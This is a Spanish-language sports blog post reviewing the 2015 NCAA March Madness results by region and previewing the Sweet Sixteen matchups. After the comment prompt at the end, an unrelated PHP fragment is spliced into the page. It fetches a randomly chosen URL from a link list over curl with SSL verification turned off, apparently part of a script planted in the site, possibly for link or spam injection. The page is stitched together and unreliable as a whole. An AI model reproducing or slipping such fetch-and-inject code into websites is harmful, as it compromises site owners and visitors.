March Madness 2015 – Sweet Sixteen

25 de March de 2015 por Ruxixon

MIDWEST (by Txusma)

Como no podía ser de otro modo los Kentucky Wildcats (1) ya estan entre los 16 mejores equipos de la competición. Su partido inaugural frente Hampton (16) fue puro trámite pero el segundo frente Cincinnatti (8) les costó algo más. Los de Calipari no tuvieron su día de cara al aro e incluso cogieron menos rebote que su rival así que tuvo que ser su asfixiante defensa (dejaron a los Bearcats en un 32% de acierto, 24% en la segunda parte) la que les sacó las canastas del fuego. Karl-Anthony Towns se marcó un gran primer partido (21 puntos y 11 rebotes) pero estuvo peor en el segundo (8-7). Willie Cauley-Stein se marcó un partido de los suyos para empezar (7-11-2 y 2 tapones) pero se olvidó de rebotear ante Cincinnati (tan solo 2 rebotes). Por su parte, Trey Liles ha cuajado dos sólidos encuentros (10-6 y 11-11).

El rival de los Wildcats seran los Mountaineers de West Virginia (5) que le vieron las orejas al lobo en el primer partido ante Buffalo pero que luego superaron brillantemente a Maryland (4). Ese segundo partido fue igualado hasta que los Terrapins no pudieron sobreponerse a la presión y al juego físico de West Virgina. De hecho, los Mountaineers son el equipo que más balones roba y más rebotes ofensivos coge de todo el país. La clase magistral de defensa que aplicaron acabó con nada menos que 23 balones perdidos por Maryland. Si mantienen este nivel seran una difícil piedra de toque para los favoritísimos Wildcats.

En la otra parte del cuadro saltó la sorpresa. Los Kansas Jayhwaks (2) fueron eliminados en segunda ronda por Wichita State (7) y eso que en el primer partido las cosas funcionaron con Frank Mason III destacando en todos y cada uno de los apartados estadísticos. Wichita llegaba al partido después de imponerse en un partido muy disputado a Indiana (10) gracias a su mayor acierto en los tiros libres y al buen hacer de Fred VanVleet y cargada de moral por poder enfrentarse a los todopoderosos vecinos que llevaban años rehusando jugar con ellos. La venganza es un plato que se sirve frío y aunque los Jayhaws comenzaron ganando, finalmente Wichita se impuso gracias a su buen acierto en el tiro exterior. Fred VanVleet volvió a ser el mejor de los suyos con un 17-6-6. Kelly Oubre demostró que aún necesita tiempo aunque se dislumbra un gran potencial, sobretodo defensivo, Cliff Alexander no ha llegado a jugar ya que se encontraba suspendido por una investigación de la NCAA y de Wayne Selden mejor no hablar. Decepcionante actuación de los Jayhawks, sin duda.

El rival de Wichita por un puesto en los Elite Eight serán, como estaba previsto, los irlandeses de Notre Dame (3). Los Fighting Irish no han entusiasmado en sus dos primeros partidos y se han plantado en el Sweet Sixteen con dos victorias agónicas. En su primer partido ante Northeastern (14) dejaron escapar la renta de 12 puntos que acumulaban a 6 minutos del final y acabaron prácticamente pidiendo la hora. Los Huskies pudieron empatar el partido a falta de unos 10 segundos pero jugaron muy mal la última posesión. El partido ante Butler (6) fue todavía más taquicárdico. Los Bulldogs se habían cargado previamente a los Texas Longhorn (11) en un partido que se resolvió en los últimos 2 minutos. Notre Dame llegó a ponerse 10 por delante en la primera parte pero Butler, con el estilo que les caracteriza, no se dejaron impresionar y le dieron la vuelta a la tortilla. En la 2ª parte fueron los Fighting Irish los que fueron a remolque pero consiguieron empatar a 55 a falta de unos 3 minutos. El marcador ya no se movería en todo el tiempo reglamentario y el partido se fue a la prórroga. Allí, nuevamente Notre Dame dio muestras de saber jugar mejor los balones decisivos y se llevó la victoria. Buenos partidos de Jerian Grant: 17 puntos, 3 rebotes, 5 asistencias y 2 robos frente Northeastern y 16 puntos, 5 rebotes y 5 asistencias frente Butler. En cambio, los 2 puntos y 10 rebotes de Myles Turner dejaron algunas dudas.

WEST (by ruxixon)

El lado oeste del cuadro trae pocas sorpresas ya que las semifinales regionales serán disputadas por 3 de los 4 equipos mejor rankeados de la zona. Únicamente Baylor ha fallado en su cita cayendo en 1ª ronda con Georgia State y eso que tenían el partido controlado a falta de 3 minutos para el final. En ese momento los dioses del baloncesto se aliaron con un errático durante buena parte de la tarde, RJ Hunter (16 puntos), para sumar los puntos necesarios (menos 1 tiro libre) para ganar el partido, buzzer beater incluido. Su entrenador y a la vez padre de la criatura lo celebraba de esta forma (hay que decir que se el tendón de Aquiles durante la celebración del título de conferencia la semana anterior).

El camino de Georgia St se detuvo ante Xavier, equipo que eliminó en 2ª ronda a Ole Miss, equipo del español Sebas Saiz, que había eliminado a su vez a los mormones de BYU en el First Four. Poco que destacar de ese duelo, si acaso nos quedamos con la versión “marcgasoliana” de Matt Stainbrook que desde sus 6-10 de altura acabó con 20 puntos, 9 rebotes y 5 asistencias. Los Panthers esperaron un error que los Muskeeters nunca cometieron. Stainbrook no fue tan relevante en esta ocasión y fue el banquillo de Xavier quien llevó la rienda anotadora del equipo (38 puntos entre Reynolds y Davis).

Xavier jugará ante Arizona en el Sweet 16, un equipo duro como una roca, que por sensaciones pueden estar ahora mismo un peldaño por encima de la Wisconsin de Frank Kaminsky de los que hablaremos después. Arizona ya ganaba de 21 puntos al descanso de su primer partido y simplemente tuvo que aguantar esa ventaja hasta el bocinazo final. Los postulantes al draft: Stanley Johnson (22 punto, 5 rebotes) y Hollis-Jefferson (23-10).

Ohio State se presentaba en este MM con uno de los jugadores de moda D’Angelo Russell, pero con un equipo que no le acompañaba demasiado, o al menos varios escalones por debajo de su nivel. Además su parte del cuadro no ayudaba demasiado. Para abrir el torneo, VCU y su mítica defensa pusieron en apuros a Ohio, pero el crack con el número 0 a la espalda no estaba dispuesto a caer tan pronto, y aguantó a su equipo durante 44 minutos (deja a las claras su incidencia en el juego), prórroga incluida. Firmó 28 puntos y 6 rebotes. Siguiente parada lo Arizona, otro equipo con una gran fortaleza defensiva y unas condiciones físicas al más alto nivel. En los primeros 20 minutos Ohio St aguantó gracias a la exhibición de pases de Russell, con Sam Thompson (18 puntos) como principal receptor de los mismos, y a una zona 2-3 que frenó a los Wildcats. En la reanudación Arizona frenó el caudal ofensivo de Russell y enchufando un par de triples made in Gabe York (19 puntos) rompieron una zona que no volvería a aparecer en todo el partido. El partido estaba finiquitado, McConell (19 puntos, 6 rebotes, 6 asistencias y 5 robos) secó a la estrella rival que acabó con un pobre 3/19 en tiro. Por cierto que Stanley Johnson estuvo missing, 10 rebotes con sólo 4 puntos y lo peor, dando muestras que es incapaz de generar sus propias canastas.

Vayamos a la parte alta del cuadro. Wisconsin ganó holgadamente a Coastal California (Kaminsky 27-12 y Dekker 20 puntos) y Oregon se llevó la victoria en un duelo igualado con Oklahoma State (LeBryan Nash 18 puntos, 7 rebotes), guiados por Joseph Young (27 puntos). Por su parte, Arkansas y North Carolina solventaron sus partidos con 3 y 2 puntos de diferencia, respectivamente. Los Razorbacks (Bobby Portis 15 puntos y 13 rebotes, Qualls 20 puntos) estuvieron más certeros al final del partido para lograr la ventaja definitva mientras que los Tar Heels sufrieron de lo lindo para doblegar a Harvard. Llegaron a dilapidar una ventaja de 16 puntos pero Justine Jackson (14 puntos) se disfrazó de salvador con dos acciones finales definitvas.

Llegamos al Arkansas – UNC donde los de Roy Williams consiguieron pasar a la siguiente etapa tras 2 años seguidos parándose en esta estación. Deben dar gracias a su base, Marcus Paige, que compensó con creces su mala primera mitad donde falló 7 de los 8 lanzamientos que intentó, factor que ayudó a Arkansas (Portis 18 puntos, 14 rebotes y 5 robos, Qualls 27 puntos y 10 rebotes) a jugar de tú a tú. Sin embargo en la segunda parte llegó lo mejor de Paige que aportó 13 puntos en un parcial de 17-0 que permitió a North Carolina llegar a los dobles dígitos de ventaja, colchón más que suficiente para saberse ganadores. Paige acabó con 22 puntos, 6 rebotes y 5 robos y Justine Jackson aportó 16 puntos.

El billete para el Elite Eight de los Tar Heels pasa por ganar a Wisconsin, seed 1 de la región. Ante Oregon no mostraron su mejor cara (Kaminsky 16 puntos, Dekker 17), y queda la duda de si se están reservando para una hipotética batalla ante Arizona o es que simplemente no están al 100 % de forma. Preocupante es el hecho de que un equipo tan pequeño como Oregon les haya ganado en el rebote. Oregon jugó duro, de ahí la diferencia de faltas que permitió a los Badgers sumar 21 puntos desde la línea personal (por 7 de Oregon), pero dejaron muy sólo a Joseph Young, que se despide del ciclo universitario con 30 puntos. Segundo año seguido que los Ducks caen ante Wisconsin.

EAST (by Txusma)

Sólo un cabeza de serie no ha llegado al Sweet Sixteen y ha sido el que menos pedigrí tenía. Los Villanova Wildcats (1) arrasaron en primera ronda a Lafayette (16) pero después cayeron de 3 puntos ante NC State (8). Lo curioso es que los Wolfpack habían conseguido imponerse a LSU (9) en primera ronda con un tiro prácticamente sobre la bocina de BeeJay Anya. En la ronda de 32, los Wildcats fueron por detrás durante todo el partido en un día horrible de sus hombres altos y de cualquiera que intentara un tiro en general. A falta de 3:14 para el final perdían de 8 puntos pero un par de triples de Darrun Hiliard los dejó a solo 2 puntos a falta de 1 minuto. Cuando todos esperaban que los Wildcats, más acostumbrados a esta clase de lides, prevalecieran fueron los Wolfpack los que lo hicieron ya que Villanova falló un triple a falta de 20 segundos que los habría puesto por delante.

NC State se enfrentará a los Lousville Cardinals (4). Los de Rick Pitino sudaron la gota gorda en primera ronda ante el jugador más alto del torneo, el senegalés Mamadou Ndiaye de UC Irvine (13). No fue hasta los últimos segundos que un robo de Terry Rozier (apuntad este nombre) selló su victoria. De todas maneras fue Ndiaye y sus 2’29m las grandes estrellas del partido y es que el pabellón se venía abajo cada vez que tocaba un balón. Acabó con 12 puntos, 5 rebotesy un tapón. El rival de Lousville en la ronda de 32 fueron los Panthers de Northern Iowa (5). Estos habían superado sin excesivos problemas a Wyoming (12) a pesar de dejar escapar la renta de 21 puntos que acumulaban al principio de la 2ª parte. De todas maneras, los Cowboys no fueron capaces de bajar de los 7 puntos de diferencia. En el Cardinals – Panthers victoria como hemos dicho para los primeros con mucha más facilidad de lo previsto. La defensa de los de Rick Pitino fue demasiado para Northern Iowa y Terry Rozier los destrozó en ataque. ¿todavía no habías apuntado el nombre? Pues les clavó 25 puntos, 5 rebotes y 7 asistencias, ojo. Montrezl Harell acabó con 14 puntos y 6 rebotes y volvió a dejar muestras de su podería en el juego interior.

En el otro lado del cuadro se enfrentarán Oklahoma (3) y Michigan State (7). Los de Tom Izzo se cargaron a Virginia (2) en segunda ronda aunque ya no sorprenden a nadie porque son uno de los clásicos de la March Madness. Los Spartans no jugaron un partido inaugural redondo pero se impusieron a Georgia (10) mientras que los Cavaliers necesitaron apretar los dientes en la 2ª parte y bordarlo en los minutos finales para ganar a Belmont (15). En su partido, la defensa de los Spartans dejó a los de Virginia por debajo del 30% de acierto y los eliminó del torneo por segundo año consecutivo.

Con los dos cabezas de serie eliminados son los Oklahoma Sooners los grandes favoritos para llegar a la final four. Para llegar a los sweet Siteen tuvieron que eliminar a Dayton (11) que se habían cargado contrapronóstico a Providence (6) en primera ronda. Los Flyers se aprovecharon de los problemas de falta de la estrella rival, Kris Dunn, y del apoyo de una numerosa afición que se desplazó en masa para animarles. Los aficionados no faltaron al partido frente los Sooners pero esta vez no fueron suficiente. Y eso que a falta de 11 minutos para el final Dayton estaba 7 puntos arriba. A partir de ahí se les fundieron los plomos y ya no volvieron a anotar una canasta en juego hasta que faltaban 1:20 y Oklahoma estaba 6 puntos por delante.

SOUTH (by ruxixon)

Empezamos hablando del lado bajo del cuadro, que ha acaparado los focos la primera jornada de la Madness. El upset protagonizado por UAB, consiguiendo eliminar a uno de los favoritos a alcanzar la Final Four con permiso de Duke, Iowa State (60-59), tuvo su dosis de culpa. El equipo de Fred Hoiberg (que suena como candidato a dirigir los Bulls la campaña próxima) se atragantó ante los Blazers y nunca pudo jugar ese estilo up tempo que le lleva a ser uno de los equipos más divertidos de ver. Si le sumamos además el pobre acierto ofensivo (o buena defensa de UAB, según como se mire), la presencia limitada por faltas del mejor jugador de los Cyclones –Niang- y la batalla perdida por el rebote no es de extrañar la derrota. El día tendría su dosis de polémica pero en otro partido. Yannick Moreira, el center senior de SMU (2 arriba en ese momento) taponaba un triple a la desesperada de Alford (27 puntos). De repente el silbato del árbitro principal empieza a sonar: el tapón había sido ilegal y UCLA (Looney, 6 puntos y 10 rebotes; Norman Powell 19 puntos, 6rebotes y 4 asistencias) se ponía por delante 60-59.

La revisión oficial no valió para nada ante la incredulidad de SMU y de muchos aficionados del planeta NCAA que grabarán a fuego el “trending topic” del día: artículo 9.3a 1 y 2 del reglamento.

SMU no puede quedarse en la decisión arbitral y es que dio vida a los californianos en un partido en el que eran favoritos.

El duelo directo entre vencedores no tuvo tanto picante y UCLA doblegó fácilmente a UAB, 97 a 75 con un sensacional Tony Parker (nada que ver con el crack de los Spurs), autor de 28 puntos, 12 rebotes y 3 tapones. Alford 25 puntos y 4 asistencias y Looney 10-11 fueron otros hombres destacados. Con este triunfo UCLA prueba a los que dudaron de ellos en el Selection Sunday que son carne de, al menos, de Sweet Sixteen. Allí se verán las caras con Gonzaga que a pesar del seed 2 de la South van de tapadillo y han acumulado dos buenos partidos, en especial el rodillo que sacaron para barrer a Iowa, en un duelo que se esperaba bastante más complicado para los Zags. De momento, Gonzaga baila al compás del en su día jugador de Kentucky –para hacerse una idea de su categoría- Wiltjer (23.5 puntos y 7.5 rebotes de media) y Pangos (17 puntos de media) y con la inestimable aportación de uno de los mejores 6th man del año, Domantas Sabonis (12.5 puntos y 10 rebotes tras los dos partidos). UCLA puede ganar a cualquiera, pero también tiene pájaras increíbles y Gonzaga ha mostrado una versión más constante a lo largo de todo el año y están ante una posición increíble para llegar al Elite Eight, ¿lo conseguirán?

Por el lado de Duke poco se puede decir, los equipos mejor rankeados no tuvieron problemas en la segunda ronda, así que simplemente destacamos las actuaciones individuales de Okafor (21 puntos en 21 minutos), Cook (22 puntos con 6/10 en triples), Tyus Jones (10 puntos y 7 asistencias) y Winslow (6 puntos, 11 rebotes y 7 asistencias) para Duke ante Robert Morris; Malik Pope con 6 puntos y 7 rebotes para el pase de los Aztecs; Poetl (18 puntos, 8 rebotes y 5 tapones) y Delon Wright (11 puntos y 6 rebotes, pero también 6 pérdidas) en Utah. Por Georgetown destacó el junior D’Vauntes Smith-Rivera que acabó el duelo frente a Eastern Washington con 25 puntos y 8 rebotes.

Desafortunadamente para los Hoyas no pudo repetir actuación en el partido de 3ª ronda contra Utah. Arrancaron mejor, creando problemas en la defensa de los Utes y llegando a ganar por 11 puntos, pero una vez llegaron los ajustes defensivos el partido cambio de bando y Utah avanzó al S16 dejando el 75-64 en el marcador. Poetl, muy lastrado por las faltas, aportó 12 puntos y Delon Wright otros tantos sumando 5 rebotes y 5 asistencias.

El rival de Utah será el favorito de la región, Duke, que tampoco se vio forzado por los Aztecs. Duke salió a toda máquina en el primer tiempo y el partido estaba sentenciado cuando enfilaron los vestuarios en el descanso. Enésima exhibición de Jahill Okafor sumando 26 puntos-6 rebotes y magnífica hoja de Justine Winslow, aportando en todas las facetas del juego: 13 puntos, 12 rebotes, 5 asistencias, 4 robos y 3 tapones. Lo que se dice un partido completo.

Impedir que el balón llegue a Okafor en el poste debe ser algo obligado para Utah, y Bachynski y Poetl deberán desgastar al center de Duke para reducir su impacto en el juego. Son un equipo correoso con una defensa muy trabajada, pero tendrán que dar su mejor versión si quieren tener opciones.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>